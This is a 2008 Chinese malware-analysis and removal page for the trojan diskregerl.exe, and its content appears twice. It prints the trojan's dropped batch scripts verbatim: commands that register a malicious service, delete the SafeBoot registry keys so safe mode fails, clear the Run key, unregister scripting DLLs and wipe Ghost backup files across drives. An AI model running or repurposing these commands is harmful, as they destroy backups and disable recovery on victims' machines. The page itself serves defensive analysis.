diskregerl.exe(Trojan.Agent.cdt)病毒手动查杀
更新时间:2008年04月16日 23:09:30 作者:
文件名称:diskregerl.exe
文件大小:45,056 字节
AV命名:Trojan.Agent.cdt
加壳方式:UPX
编写语言:VC
文件MD5:e98a4571cf72b798077d12d6c4894629
行为分析:
1、拷贝文件:
C:\windows\system32\diskregerl.exe 45,056 字节
2、无添加启动项举动。
3、释放2个批处理:
内容分别为:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 创建网络连接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 开始.wav"
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤独更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二个:
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、连接网站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外该病毒可能恶意锁定IE主页,不过未实现。
解决方法:
1、重启计算机。
2、删除文件:
C:\windows\system32\diskregerl.exe
3、如果重启后病毒无法删除,请下载冰刃(该软件可到down.45it.com下载),结束其进程。
行为分析:
1、拷贝文件:
C:\windows\system32\diskregerl.exe 45,056 字节
2、无添加启动项举动。
3、释放2个批处理:
内容分别为:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 创建网络连接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 开始.wav"
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤独更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二个:
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、连接网站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外该病毒可能恶意锁定IE主页,不过未实现。
解决方法:
1、重启计算机。
2、删除文件:
C:\windows\system32\diskregerl.exe
3、如果重启后病毒无法删除,请下载冰刃(该软件可到down.45it.com下载),结束其进程。
相关文章
病毒Autorun.inf、pagefile.pif等的解决办法
病毒Autorun.inf、pagefile.pif等的解决办法...2007-03-03
已证实Au_.exe是NSIS安装包的一个组成部分与说明...2007-03-03
防范“熊猫烧香”病毒的设置方法...2007-03-03
木马下载器前仆后继,AOTU病毒群卷土重来(专杀4月15日升级到1.4版)
磁碟机病毒在各安全厂商和媒体的一致喊打声中突然销声匿迹,但这仅仅是盗号集团的暂时退却,很快,我们发现又一类利用配置autorun.inf配置自动运行的木马下载者蜂涌而至,同样,这些疯狂的下载者,可一次性下载20-30个盗号木马,用户的电脑将面临又一次蹂躏。2008-05-05
用批处理实现Auto病毒专杀工具的代码...2007-05-05
使用仙剑奇侠传四算号器不小心中了广告插件的解决办法...2007-08-08
copy.exe 病毒删除的批处理文件...2007-03-03
sxs.exe病毒专杀工具之“橙色八月专杀工具.bat”...2006-12-12
恶劣的U盘病毒Worm.Pabug.ck(OSO.exe)分析与查杀
恶劣的U盘病毒Worm.Pabug.ck(OSO.exe)分析与查杀...2007-02-02
完美修复SVCHOST.EXE出现0x745f2780错误的方法
完美修复SVCHOST.EXE出现0x745f2780错误的方法...2007-03-03
最新评论